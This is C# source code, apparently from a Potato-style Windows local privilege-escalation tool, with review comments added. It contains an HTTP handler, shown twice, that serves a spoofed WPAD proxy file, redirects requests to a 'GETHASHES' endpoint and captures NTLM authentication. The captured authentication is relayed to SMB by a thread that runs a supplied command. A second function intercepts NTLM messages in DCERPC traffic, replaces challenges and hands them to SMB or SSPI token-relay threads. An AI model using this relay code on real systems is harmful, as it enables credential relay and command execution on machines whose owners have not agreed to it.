        /// <summary>
        /// HTTP request handler. Dispatches on request method and URL: a two-step NTLM exchange
        /// on any URL containing "GETHASHES", a generated PAC script for the two wpad.dat URLs,
        /// a 302 redirect into the GETHASHES flow for other GET-like requests, a fixed WebDAV
        /// multistatus body for PROPFIND on http://localhost/test, and 404 for everything else.
        /// </summary>
        /// <param name="sender">Event source; not used in the body.</param>
        /// <param name="e">Carries the request and the response whose OutputStream is written to.</param>
        /// <remarks>
        /// Hand-off to the SMB relay thread goes through <c>ntlmQueue</c> (a plain, unsynchronised
        /// Queue&lt;byte[]&gt; — see the re-creation below) plus the <c>Config.signalHandler</c> /
        /// <c>Config.signalHandlerClient</c> events. Every WaitOne() here has no timeout, so a relay
        /// thread that never signals hangs the handler. <c>state</c> and <c>workingUri</c> are
        /// instance fields mutated without any locking visible in this method —
        /// NOTE(review): confirm the server invokes this handler serially, otherwise concurrent
        /// requests race on them.
        /// </remarks>
        public void recvRequest(object sender, HttpRequestEventArgs e)
        {
            using (var writer = new StreamWriter(e.Response.OutputStream))
            {

                HttpRequest request = e.Request;
                // The response object the branches below fill in.
                HttpResponse response = e.Response;
                // Request headers; only "Authorization" is read from them.
                System.Collections.Specialized.NameValueCollection headers = request.Headers;
                Console.WriteLine("Got Request: "+request.HttpMethod+" "+request.Url.AbsoluteUri.ToString()+"!");

                // Method is compared case-insensitively via ToLower(): HEAD/GET/POST/OPTIONS/PUT share
                // the first branch, PROPFIND has its own, anything else gets 404 at the bottom.
                if (request.HttpMethod.ToLower().Equals("head") || request.HttpMethod.ToLower().Equals("get") || request.HttpMethod.ToLower().Equals("post") || request.HttpMethod.ToLower().Equals("options") || request.HttpMethod.ToLower().Equals("put"))
                {
                    // Any URL containing GETHASHES is the NTLM endpoint (the redirect branch below
                    // appends a random suffix, so a substring match is used rather than equality).
                    if (request.Url.AbsoluteUri.ToString().Contains("GETHASHES"))
                    {
                        Console.WriteLine("Sending 401...");
                        // First contact: no Authorization header and no exchange in flight —
                        // answer 401 with a bare NTLM challenge header and reset the state machine.
                        if (headers["Authorization"] == null && workingUri == null)
                        {
                            Console.WriteLine("Got request for hashes...");
                            response.Headers.Add("WWW-Authenticate","NTLM");
                            response.StatusCode = 401;
                            state = 0;
                        }

                        else
                        {
                            String authHeader = headers["Authorization"];
                            // getNtlmBlock presumably returns null when the header carries no NTLM
                            // payload (inferred from the null check below; its body is not visible here).
                            byte[] ntlmBlock = getNtlmBlock(authHeader);
                            // Only proceed when no exchange is in flight or this request belongs to it.
                            if (ntlmBlock != null && (workingUri == null || workingUri == request.Url.AbsoluteUri.ToString()))
                            {
                                workingUri = request.Url.AbsoluteUri.ToString();
                                // state 0: first NTLM block. Start a fresh relay thread, hand the block
                                // over, and block until the relay thread signals that a challenge is queued.
                                if (state == 0)
                                {
                                    Console.WriteLine("Parsing initial NTLM auth...\n"+authHeader);
                                    smbRelayThread = new Thread(()=>smbRelay.startSMBRelay(ntlmQueue,this.cmd));
                                    // Note the order: the thread is started before the block is enqueued;
                                    // the relay thread's own wait is not visible from here.
                                    ntlmQueue.Clear();
                                    smbRelayThread.Start();
                                    ntlmQueue.Enqueue(ntlmBlock);
                                    byte[] challenge = null;
                                    Config.signalHandlerClient.WaitOne();
                                    challenge = ntlmQueue.Dequeue();
                                    // NOTE(review): Convert.ToBase64String(null) throws ArgumentNullException,
                                    // so the null check on the next line can never be reached with a null
                                    // challenge — the log line and the guard are in the wrong order.
                                    Console.WriteLine("Got SMB challenge " + Convert.ToBase64String(challenge));
                                    if(challenge != null){
                                        response.Headers.Add("WWW-Authenticate","NTLM " + Convert.ToBase64String(challenge));
                                        state = state + 1;
                                        response.StatusCode = 401;
                                    }
                                }
                                // state 1: final NTLM block on the same URL. Hand it to the relay thread,
                                // wake it, and wait for a one-byte status back on the same queue.
                                else if (state == 1 && request.Url.AbsoluteUri.ToString().Equals(workingUri))
                                {
                                    Console.WriteLine("Parsing final auth...");
                                    // Byte 8 is the low byte of the NTLMSSP MessageType field (3 = AUTHENTICATE).
                                    // No length check precedes this index; a short block throws here.
                                    if (ntlmBlock[8] == 3)
                                    {
                                        Console.WriteLine(Convert.ToBase64String(ntlmBlock));
                                    }
                                    ntlmQueue.Enqueue(ntlmBlock);
                                    Config.signalHandler.Set();
                                    response.StatusCode = 200;
                                    state = state + 1;
                                    Config.signalHandlerClient.WaitOne();
                                    byte[] checkStatus = ntlmQueue.Dequeue();
                                    // Status byte 99 ends the whole exchange (finished.Set()); any other value
                                    // tears the relay down and resets the state machine for another round.
                                    // checkStatus[0] is read without a length/null check.
                                    if (checkStatus[0] == 99)
                                    {
                                        writer.Close();
                                        // NOTE(review): Thread.Abort throws PlatformNotSupportedException on
                                        // .NET Core / .NET 5+; this only works on .NET Framework.
                                        smbRelayThread.Abort();
                                        finished.Set();
                                        return;
                                    }
                                    else
                                    {
                                        workingUri = null;
                                        smbRelayThread.Abort();
                                        ntlmQueue = new Queue<byte[]>();
                                        smbRelay = new SMBRelay();
                                        writer.Close();
                                        state = 0;
                                    }
                                }
                            }
                        }
                        // Every GETHASHES request that did not return above ends here. Close() on an
                        // already-closed StreamWriter is a no-op, so the using block's Dispose is harmless.
                        writer.Close();
                        return;
                    }
                    // PAC file: only these two exact URLs match.
                    else if (request.Url.AbsoluteUri.ToString().Equals("http://127.0.0.1/wpad.dat") || request.Url.AbsoluteUri.ToString().Equals("http://wpad/wpad.dat"))
                    {
                        Console.WriteLine("Spoofing wpad...");
                        response.StatusCode = 200;
                        // The script sends "localhost" and each wpad_exclude entry DIRECT and everything
                        // else via 127.0.0.1:80. Entries are spliced in unescaped — a quote or backslash
                        // in one would break the PAC syntax.
                        String responseTxt = "function FindProxyForURL(url,host){if (dnsDomainIs(host, \"localhost\")) return \"DIRECT\";";
                        for (int i = 0; i < wpad_exclude.Length;i++ )
                        {
                            responseTxt = responseTxt + "if (dnsDomainIs(host, \"" + wpad_exclude[i] + "\")) return \"DIRECT\";";
                        }
                        responseTxt = responseTxt + "return \"PROXY 127.0.0.1:80\";}";
                        writer.Write(responseTxt);
                    }
                    // Anything else GET-like (except URLs mentioning wpad or favicon) is bounced into
                    // the GETHASHES flow while no exchange is in flight.
                    else if (workingUri == null && !request.Url.AbsoluteUri.ToString().Contains("wpad") && !request.Url.AbsoluteUri.ToString().Contains("favicon"))
                    {
                        // new Random() per request is clock-seeded; nothing in this method treats the
                        // suffix as a secret — it only distinguishes the redirect URL.
                        Random rnd = new Random();
                        int sess = rnd.Next(1, 1000000);
                        response.Headers.Add("Location", "http://localhost:"+srvPort+"/GETHASHES"+sess);

                        Console.WriteLine("Redirecting to target.."+response.Headers["Location"]);
                        response.StatusCode = 302;
                        writer.Close();
                    }

                }
                // PROPFIND: only the fixed /test path gets a WebDAV 207; the XML body is a constant
                // describing a single collection resource. Everything else is 404.
                else if (request.HttpMethod.ToLower().Equals("propfind"))
                {
                    if (request.Url.AbsoluteUri.ToString().Equals("http://localhost/test"))
                    {
                        Console.WriteLine("Got PROPFIND for /test... Responding");
                        response.StatusCode = 207;
                        response.ContentType = "application/xml";
                        writer.Write("<?xml version='1.0' encoding='UTF-8'?><ns0:multistatus xmlns:ns0=\"DAV:\"><ns0:response><ns0:href>/test/</ns0:href><ns0:propstat><ns0:prop><ns0:resourcetype><ns0:collection /></ns0:resourcetype><ns0:creationdate>2015-08-03T14:53:38Z</ns0:creationdate><ns0:getlastmodified>Tue, 11 Aug 2015 15:48:25 GMT</ns0:getlastmodified><ns0:displayname>test</ns0:displayname><ns0:lockdiscovery /><ns0:supportedlock><ns0:lockentry><ns0:lockscope><ns0:exclusive /></ns0:lockscope><ns0:locktype><ns0:write /></ns0:locktype></ns0:lockentry><ns0:lockentry><ns0:lockscope><ns0:shared /></ns0:lockscope><ns0:locktype><ns0:write /></ns0:locktype></ns0:lockentry></ns0:supportedlock></ns0:prop><ns0:status>HTTP/1.1 200 OK</ns0:status></ns0:propstat></ns0:response></ns0:multistatus>");
                        writer.Close();
                    }
                    else
                    {
                        Console.WriteLine("Got PROPFIND for "+request.Url.AbsoluteUri.ToString()+" returning 404");
                        response.StatusCode = 404;
                        writer.Close();
                    }
                }
                // Any other method: 404.
                else
                {
                    Console.WriteLine("Got " + request.HttpMethod + " for " + request.Url.AbsoluteUri.ToString()+" replying 404");
                    response.StatusCode = 404;
                    writer.Close();
                }

            }
        }
        /// <summary>
        /// HTTP request handler. Dispatches on request method and URL: a two-step NTLM exchange
        /// on any URL containing "GETHASHES", a generated PAC script for the two wpad.dat URLs,
        /// a 302 redirect into the GETHASHES flow for other GET-like requests, a fixed WebDAV
        /// multistatus body for PROPFIND on http://localhost/test, and 404 for everything else.
        /// </summary>
        /// <param name="sender">Event source; not used in the body.</param>
        /// <param name="e">Carries the request and the response whose OutputStream is written to.</param>
        /// <remarks>
        /// Hand-off to the SMB relay thread goes through <c>ntlmQueue</c> (a plain, unsynchronised
        /// Queue&lt;byte[]&gt; — see the re-creation below) plus the <c>Config.signalHandler</c> /
        /// <c>Config.signalHandlerClient</c> events. Every WaitOne() here has no timeout, so a relay
        /// thread that never signals hangs the handler. <c>state</c> and <c>workingUri</c> are
        /// instance fields mutated without any locking visible in this method —
        /// NOTE(review): confirm the server invokes this handler serially, otherwise concurrent
        /// requests race on them.
        /// </remarks>
        public void recvRequest(object sender, HttpRequestEventArgs e)
        {
            using (var writer = new StreamWriter(e.Response.OutputStream))
            {
                HttpRequest request = e.Request;
                // The response object the branches below fill in.
                HttpResponse response = e.Response;
                // Request headers; only "Authorization" is read from them.
                System.Collections.Specialized.NameValueCollection headers = request.Headers;
                Console.WriteLine("Got Request: " + request.HttpMethod + " " + request.Url.AbsoluteUri.ToString() + "!");

                // Method is compared case-insensitively via ToLower(): HEAD/GET/POST/OPTIONS/PUT share
                // the first branch, PROPFIND has its own, anything else gets 404 at the bottom.
                if (request.HttpMethod.ToLower().Equals("head") || request.HttpMethod.ToLower().Equals("get") || request.HttpMethod.ToLower().Equals("post") || request.HttpMethod.ToLower().Equals("options") || request.HttpMethod.ToLower().Equals("put"))
                {
                    // Any URL containing GETHASHES is the NTLM endpoint (the redirect branch below
                    // appends a random suffix, so a substring match is used rather than equality).
                    if (request.Url.AbsoluteUri.ToString().Contains("GETHASHES"))
                    {
                        Console.WriteLine("Sending 401...");
                        // First contact: no Authorization header and no exchange in flight —
                        // answer 401 with a bare NTLM challenge header and reset the state machine.
                        if (headers["Authorization"] == null && workingUri == null)
                        {
                            Console.WriteLine("Got request for hashes...");
                            response.Headers.Add("WWW-Authenticate", "NTLM");
                            response.StatusCode = 401;
                            state = 0;
                        }

                        else
                        {
                            String authHeader = headers["Authorization"];
                            // getNtlmBlock presumably returns null when the header carries no NTLM
                            // payload (inferred from the null check below; its body is not visible here).
                            byte[] ntlmBlock  = getNtlmBlock(authHeader);
                            // Only proceed when no exchange is in flight or this request belongs to it.
                            if (ntlmBlock != null && (workingUri == null || workingUri == request.Url.AbsoluteUri.ToString()))
                            {
                                workingUri = request.Url.AbsoluteUri.ToString();
                                // state 0: first NTLM block. Start a fresh relay thread, hand the block
                                // over, and block until the relay thread signals that a challenge is queued.
                                if (state == 0)
                                {
                                    Console.WriteLine("Parsing initial NTLM auth...\n" + authHeader);
                                    smbRelayThread = new Thread(() => smbRelay.startSMBRelay(ntlmQueue, this.cmd));
                                    // Note the order: the thread is started before the block is enqueued;
                                    // the relay thread's own wait is not visible from here.
                                    ntlmQueue.Clear();
                                    smbRelayThread.Start();
                                    ntlmQueue.Enqueue(ntlmBlock);
                                    byte[] challenge = null;
                                    Config.signalHandlerClient.WaitOne();
                                    challenge = ntlmQueue.Dequeue();
                                    // NOTE(review): Convert.ToBase64String(null) throws ArgumentNullException,
                                    // so the null check on the next line can never be reached with a null
                                    // challenge — the log line and the guard are in the wrong order.
                                    Console.WriteLine("Got SMB challenge " + Convert.ToBase64String(challenge));
                                    if (challenge != null)
                                    {
                                        response.Headers.Add("WWW-Authenticate", "NTLM " + Convert.ToBase64String(challenge));
                                        state = state + 1;
                                        response.StatusCode = 401;
                                    }
                                }
                                // state 1: final NTLM block on the same URL. Hand it to the relay thread,
                                // wake it, and wait for a one-byte status back on the same queue.
                                else if (state == 1 && request.Url.AbsoluteUri.ToString().Equals(workingUri))
                                {
                                    Console.WriteLine("Parsing final auth...");
                                    // Byte 8 is the low byte of the NTLMSSP MessageType field (3 = AUTHENTICATE).
                                    // No length check precedes this index; a short block throws here.
                                    if (ntlmBlock[8] == 3)
                                    {
                                        Console.WriteLine(Convert.ToBase64String(ntlmBlock));
                                    }
                                    ntlmQueue.Enqueue(ntlmBlock);
                                    Config.signalHandler.Set();
                                    response.StatusCode = 200;
                                    state = state + 1;
                                    Config.signalHandlerClient.WaitOne();
                                    byte[] checkStatus = ntlmQueue.Dequeue();
                                    // Status byte 99 ends the whole exchange (finished.Set()); any other value
                                    // tears the relay down and resets the state machine for another round.
                                    // checkStatus[0] is read without a length/null check.
                                    if (checkStatus[0] == 99)
                                    {
                                        writer.Close();
                                        // NOTE(review): Thread.Abort throws PlatformNotSupportedException on
                                        // .NET Core / .NET 5+; this only works on .NET Framework.
                                        smbRelayThread.Abort();
                                        finished.Set();
                                        return;
                                    }
                                    else
                                    {
                                        workingUri = null;
                                        smbRelayThread.Abort();
                                        ntlmQueue = new Queue <byte[]>();
                                        smbRelay  = new SMBRelay();
                                        writer.Close();
                                        state = 0;
                                    }
                                }
                            }
                        }
                        // Every GETHASHES request that did not return above ends here. Close() on an
                        // already-closed StreamWriter is a no-op, so the using block's Dispose is harmless.
                        writer.Close();
                        return;
                    }
                    // PAC file: only these two exact URLs match.
                    else if (request.Url.AbsoluteUri.ToString().Equals("http://127.0.0.1/wpad.dat") || request.Url.AbsoluteUri.ToString().Equals("http://wpad/wpad.dat"))
                    {
                        Console.WriteLine("Spoofing wpad...");
                        response.StatusCode = 200;
                        // The script sends "localhost" and each wpad_exclude entry DIRECT and everything
                        // else via 127.0.0.1:80. Entries are spliced in unescaped — a quote or backslash
                        // in one would break the PAC syntax.
                        String responseTxt = "function FindProxyForURL(url,host){if (dnsDomainIs(host, \"localhost\")) return \"DIRECT\";";
                        for (int i = 0; i < wpad_exclude.Length; i++)
                        {
                            responseTxt = responseTxt + "if (dnsDomainIs(host, \"" + wpad_exclude[i] + "\")) return \"DIRECT\";";
                        }
                        responseTxt = responseTxt + "return \"PROXY 127.0.0.1:80\";}";
                        writer.Write(responseTxt);
                    }
                    // Anything else GET-like (except URLs mentioning wpad or favicon) is bounced into
                    // the GETHASHES flow while no exchange is in flight.
                    else if (workingUri == null && !request.Url.AbsoluteUri.ToString().Contains("wpad") && !request.Url.AbsoluteUri.ToString().Contains("favicon"))
                    {
                        // new Random() per request is clock-seeded; nothing in this method treats the
                        // suffix as a secret — it only distinguishes the redirect URL.
                        Random rnd  = new Random();
                        int    sess = rnd.Next(1, 1000000);
                        response.Headers.Add("Location", "http://localhost:" + srvPort + "/GETHASHES" + sess);

                        Console.WriteLine("Redirecting to target.." + response.Headers["Location"]);
                        response.StatusCode = 302;
                        writer.Close();
                    }
                }
                // PROPFIND: only the fixed /test path gets a WebDAV 207; the XML body is a constant
                // describing a single collection resource. Everything else is 404.
                else if (request.HttpMethod.ToLower().Equals("propfind"))
                {
                    if (request.Url.AbsoluteUri.ToString().Equals("http://localhost/test"))
                    {
                        Console.WriteLine("Got PROPFIND for /test... Responding");
                        response.StatusCode  = 207;
                        response.ContentType = "application/xml";
                        writer.Write("<?xml version='1.0' encoding='UTF-8'?><ns0:multistatus xmlns:ns0=\"DAV:\"><ns0:response><ns0:href>/test/</ns0:href><ns0:propstat><ns0:prop><ns0:resourcetype><ns0:collection /></ns0:resourcetype><ns0:creationdate>2015-08-03T14:53:38Z</ns0:creationdate><ns0:getlastmodified>Tue, 11 Aug 2015 15:48:25 GMT</ns0:getlastmodified><ns0:displayname>test</ns0:displayname><ns0:lockdiscovery /><ns0:supportedlock><ns0:lockentry><ns0:lockscope><ns0:exclusive /></ns0:lockscope><ns0:locktype><ns0:write /></ns0:locktype></ns0:lockentry><ns0:lockentry><ns0:lockscope><ns0:shared /></ns0:lockscope><ns0:locktype><ns0:write /></ns0:locktype></ns0:lockentry></ns0:supportedlock></ns0:prop><ns0:status>HTTP/1.1 200 OK</ns0:status></ns0:propstat></ns0:response></ns0:multistatus>");
                        writer.Close();
                    }
                    else
                    {
                        Console.WriteLine("Got PROPFIND for " + request.Url.AbsoluteUri.ToString() + " returning 404");
                        response.StatusCode = 404;
                        writer.Close();
                    }
                }
                // Any other method: 404.
                else
                {
                    Console.WriteLine("Got " + request.HttpMethod + " for " + request.Url.AbsoluteUri.ToString() + " replying 404");
                    response.StatusCode = 404;
                    writer.Close();
                }
            }
        }
        /// <summary>
        /// Inspects one intercepted buffer for an embedded NTLMSSP message and, by message type,
        /// hands it to the SMB relay thread or the SSPI token-relay thread, or swaps the challenge
        /// it carries. Returns the buffer to forward on.
        /// </summary>
        /// <param name="buf">
        /// Raw intercepted bytes — presumably a DCERPC PDU, going by the log text and the
        /// <c>DCERPCNtlmHandler</c> reference below; the framing is not parsed here.
        /// </param>
        /// <returns>
        /// <paramref name="buf"/> unchanged, or the result of <c>replaceChallenge</c> when a
        /// Type 2 (CHALLENGE) message was rewritten.
        /// </returns>
        /// <remarks>
        /// Relies on instance/static state declared outside this view: smbRelayThread,
        /// tokenRelayThread, challenge, challengeCount, dropFirst, enable_token, cmd, ntlmQueue,
        /// new_ntlmQueueIn and new_ntlmQueueOut. Every wait here (WaitOne, BlockingCollection.Take)
        /// is unbounded. Any exception is logged to the console and the original buffer is returned.
        /// </remarks>
        private byte[] doNTLMMagic(byte[] buf)
        {
            byte[] ret_bytes = buf;

            // Lazily build the relay threads; neither is started here.
            if (smbRelayThread == null)
            {
                // NOTE(review): this local shadows the instance field smbRelay that recvRequest
                // uses; the lambda captures the local, so the field is left untouched.
                SMBRelay smbRelay = new SMBRelay();
                smbRelayThread = new Thread(() => smbRelay.startSMBRelay(NTLMRelayingProxy.ntlmQueue, cmd));
            }

            // Created unconditionally, but only ever started on the enable_token path below.
            if (tokenRelayThread == null)
            {
                SSPIHelper tokenRelay = new SSPIHelper();
                tokenRelayThread = new Thread(() => tokenRelay.TokenRelay(new_ntlmQueueIn, new_ntlmQueueOut));
            }
            try
            {
                // NTLMExtract presumably returns null when buf holds no NTLMSSP payload (inferred
                // from the null check; its body is not visible here).
                byte[] ntlm_bytes = NTLMExtract(buf);
                if (ntlm_bytes != null)
                {
                    // Byte 8 is the low byte of the NTLMSSP MessageType field: 1 NEGOTIATE,
                    // 2 CHALLENGE, 3 AUTHENTICATE. No length check precedes the index; a short
                    // extract throws IndexOutOfRangeException, which the catch below swallows.
                    if (ntlm_bytes[8] == 1)
                    {
                        // enable_token is only compared with null, so any non-null value selects
                        // the token-relay path.
                        if (enable_token != null)
                        {
                            Console.WriteLine("GOT TYPE1 MESSAGE TOKEN-RELAY!");
                            new_ntlmQueueIn.Add(ntlm_bytes);
                            tokenRelayThread.Start();
                            // Blocks until the token-relay thread publishes a challenge.
                            challenge = new_ntlmQueueOut.Take();
                        }
                        // NOTE(review): IsAlive is false both before Start() and after the thread has
                        // exited, so a finished relay thread would be Start()ed a second time here,
                        // which throws ThreadStateException (caught below).
                        else if (!smbRelayThread.IsAlive)
                        {
                            Console.WriteLine("GOT TYPE1 MESSAGE");
                            ntlmQueue.Enqueue(ntlm_bytes);
                            smbRelayThread.Start();
                            Config.signalHandlerClient.WaitOne();
                            challenge = ntlmQueue.Dequeue();
                        }
                    }
                    else if (ntlm_bytes[8] == 2)
                    {
                        Console.WriteLine("GOT TYPE2 MESSAGE (CHALLENGE) from RPCs");
                        // Rewrite every challenge except the very first one when dropFirst is set.
                        // NOTE(review): challenge may still be null here if no Type 1 was seen on this
                        // handler; how replaceChallenge treats null is not visible.
                        if (challengeCount > 0 || !dropFirst)
                        {
                            ret_bytes = replaceChallenge(buf, challenge);
                        }
                        challengeCount = challengeCount + 1;
                    }
                    else if (ntlm_bytes[8] == 3)
                    {
                        if (enable_token != null)
                        {
                            Console.WriteLine("GOT TYPE3 MESSAGE (AUTH) TOKEN-RELAY");

                            new_ntlmQueueIn.Add(ntlm_bytes);
                            byte[] checkStatus = new_ntlmQueueOut.Take();
                            // Status byte 99 ends the session (finished.Set()); any other value resets
                            // the token-relay queues and thread for another round.
                            if (checkStatus[0] == 99)
                            {
                                // NOTE(review): the fixed sleep stands in for a completion signal — nothing
                                // guarantees the relay thread has actually finished. Thread.Abort also
                                // throws PlatformNotSupportedException on .NET Core / .NET 5+.
                                Thread.Sleep(500); // Incase its not finished!
                                tokenRelayThread.Abort();
                                DCERPCNtlmHandler.finished.Set();
                                // this.disconnected.Set();
                            }
                            else
                            {
                                new_ntlmQueueIn  = new BlockingCollection <byte[]>();
                                new_ntlmQueueOut = new BlockingCollection <byte[]>();
                                challengeCount   = 0;
                                tokenRelayThread = null;
                            }
                        }
                        else
                        {
                            Console.WriteLine("GOT TYPE3 MESSAGE (AUTH)");

                            ntlmQueue.Enqueue(ntlm_bytes);
                            Config.signalHandler.Set();
                            Config.signalHandlerClient.WaitOne();
                            byte[] checkStatus = ntlmQueue.Dequeue();
                            // NOTE(review): signalHandler is set a second time after the wait; the
                            // intent is not visible from this method.
                            Config.signalHandler.Set();
                            // Unlike the token path there is no reset branch here: a non-99 status
                            // leaves the relay thread and queues as they are.
                            if (checkStatus[0] == 99)
                            {
                                Thread.Sleep(500);
                                smbRelayThread.Abort();
                                // NOTE(review): tokenRelayThread was never started on this path; confirm
                                // that Abort() on an unstarted thread is the intended behaviour.
                                tokenRelayThread.Abort();
                                DCERPCNtlmHandler.finished.Set();
                                // this.disconnected.Set();
                            }
                        }
                    }
                }
            }
            // Catch-all: any failure above (including the index and Start() cases noted) is
            // printed and the buffer is forwarded as-is. The early return duplicates the
            // final one.
            catch (Exception e)
            {
                Console.WriteLine(e);
                return(ret_bytes);
            }

            return(ret_bytes);
        }